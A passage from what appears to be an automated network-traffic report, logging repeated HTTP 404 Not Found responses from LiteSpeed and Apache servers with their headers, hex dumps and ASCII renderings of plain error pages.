                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 07:17:21 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 07:17:40 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 07:17:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 07:17:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 07:17:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 07:18:08 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 07:18:10 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 07:18:13 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 